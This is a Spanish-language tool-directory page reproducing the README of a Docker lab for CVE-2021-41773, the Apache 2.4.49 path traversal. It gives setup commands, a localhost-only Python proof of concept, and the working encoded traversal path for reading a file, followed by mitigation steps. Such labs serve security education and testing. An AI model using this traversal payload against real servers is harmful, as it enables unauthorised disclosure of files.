Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773-Apache-Lab — Laboratorio basado en Docker para reproducir CVE-2021-41773 (Apache HTTP Server 2.4.49) mediante path traversal controlado y divulgación de archivos usando un PoC personalizado en Python. | Kitploit
Herramientas/GitHubGitHub/s-amnajafri/cve-2021-41773-apache-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubs-amnajafri/cve-2021-41773-apache-lab

CVE-2021-41773-Apache-Lab

Laboratorio basado en Docker para reproducir CVE-2021-41773 (Apache HTTP Server 2.4.49) mediante path traversal controlado y divulgación de archivos usando un PoC personalizado en Python.

Ver Repositorio
1hace 27 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-41773 — Laboratorio de Apache HTTP Server 2.4.49

Reproducción de CVE-2021-41773, una vulnerabilidad de path traversal (recorrido de rutas) en Apache HTTP Server 2.4.49.

Este proyecto usa Docker para crear un entorno vulnerable aislado y un PoC en Python para demostrar la divulgación controlada de archivos.

Seguridad: El PoC solo acepta destinos localhost, 127.0.0.1 o ::1. Las pruebas deben permanecer dentro del laboratorio aislado.

Objetivo

Este proyecto demuestra:

  • Configurar Apache HTTP Server 2.4.49 en Docker
  • Verificar la versión vulnerable de Apache
  • Reproducir CVE-2021-41773
  • Demostrar la divulgación controlada de archivos
  • Desarrollar un PoC personalizado en Python
  • Recopilar evidencia de explotación
  • Documentar pasos de mitigación

La demostración se centra en la divulgación de archivos en lugar de la ejecución remota de código.

Project Structure

root@kitploit:~
CVE-2021-41773-Apache-Lab/
│
├── docker/
│   ├── Dockerfile
│   ├── httpd-vulnerable.conf
│   └── secret.txt
│
├── exploit/
│   └── exploit.py
│
├── screenshots/
│   ├── 01-docker-container.png
│   ├── 02-apache-version.png
│   └── 03-successful-exploit.png
│
├── report/
│   └── CVE-2021-41773-Exploit-Report.pdf
│
├── requirements.txt
├── .gitignore
└── README.md

Requisitos

  • Docker
  • Python 3.x
  • Git

El PoC usa únicamente la biblioteca estándar de Python y no requiere paquetes de Python de terceros.

Configuración del laboratorio

1. Construir la imagen de Docker

Desde la raíz del repositorio:

root@kitploit:~
docker build -t cve-2021-41773-lab ./docker

2. Iniciar el servidor Apache vulnerable

root@kitploit:~
docker run --rm --name cve-2021-41773-lab \
  -p 127.0.0.1:8080:80 \
  cve-2021-41773-lab

Mantén esta terminal en ejecución.

El servicio Apache se expone únicamente a través de:

root@kitploit:~
127.0.0.1:8080

Verificación

Verificar el contenedor

En otra terminal:

root@kitploit:~
docker ps

El contenedor debería mostrar:

root@kitploit:~
127.0.0.1:8080->80/tcp

Verificar la versión de Apache

root@kitploit:~
docker exec cve-2021-41773-lab httpd -v

Resultado esperado:

root@kitploit:~
Server version: Apache/2.4.49 (Unix)

Verificar el acceso HTTP normal

root@kitploit:~
curl http://127.0.0.1:8080/

Se debería devolver la página de prueba de Apache.

Explotación

El PoC se encuentra en:

root@kitploit:~
exploit/exploit.py

Ejecuta:

root@kitploit:~
python3 exploit/exploit.py

El destino predeterminado es:

root@kitploit:~
http://127.0.0.1:8080

El archivo de prueba predeterminado es:

root@kitploit:~
/lab/secret.txt

Una ejecución exitosa produce:

root@kitploit:~
[+] Vulnerability reproduced.
[+] Controlled file disclosure confirmed.

El PoC muestra entonces el contenido del archivo controlado del laboratorio.

Cómo funciona el PoC

El PoC primero comprueba que el destino sea una dirección local:

root@kitploit:~
localhost
127.0.0.1
::1

Luego construye una ruta con componentes de traversal codificados:

root@kitploit:~
/cgi-bin/.%2e/.%2e/.%2e/.%2e/lab/secret.txt

La solicitud se envía usando el módulo socket estándar de Python. Esto le da al PoC control directo sobre la ruta de la solicitud HTTP.

El servidor Apache 2.4.49 vulnerable procesa la ruta modificada y devuelve el contenido de:

root@kitploit:~
/lab/secret.txt

Recuperar este archivo confirma el path traversal y la divulgación controlada de archivos.

Resumen de la vulnerabilidad

CVE: CVE-2021-41773

Producto: Apache HTTP Server

Versión afectada demostrada: 2.4.49

Tipo de vulnerabilidad: Path Traversal / Divulgación de archivos

CVE-2021-41773 es una vulnerabilidad de path traversal en Apache HTTP Server 2.4.49. Una URL especialmente manipulada puede omitir las restricciones de ruta previstas y permitir el acceso a archivos fuera del directorio esperado.

Bajo ciertas configuraciones, la vulnerabilidad puede tener consecuencias más graves. Este proyecto demuestra deliberadamente la divulgación controlada de archivos en un entorno Docker aislado.

Evidencia

Las capturas de pantalla recopiladas durante las pruebas se guardan en:

root@kitploit:~
evidence/

La evidencia incluye:

  1. Contenedor Docker en ejecución
  2. Verificación de la versión de Apache HTTP Server 2.4.49
  3. Ejecución exitosa del PoC en Python

Mitigación

La mitigación principal es actualizar Apache HTTP Server a una versión corregida.

Medidas defensivas adicionales:

  • Mantener Apache parcheado periódicamente.
  • Restringir el acceso a archivos sensibles.
  • Revisar las configuraciones de Alias y CGI.
  • Aplicar permisos de privilegio mínimo.
  • Evitar exponer servicios innecesarios.
  • Supervisar los registros del servidor en busca de solicitudes sospechosas de path traversal.

Referencias

  • Apache HTTP Server Security Advisory: https://httpd.apache.org/security/vulnerabilities_24.html

  • NIST National Vulnerability Database: https://nvd.nist.gov/vuln/detail/CVE-2021-41773

  • CERT-EU Security Advisory: https://cert.europa.eu/publications/security-advisories/2021-054/

Descargo de responsabilidad

Este proyecto está destinado únicamente a la educación en seguridad autorizada y a pruebas controladas de laboratorio.

El entorno Docker y el PoC están diseñados para pruebas locales. No uses el PoC contra sistemas que no te pertenezcan o para los que no tengas permiso explícito de evaluar.

Descargar herramienta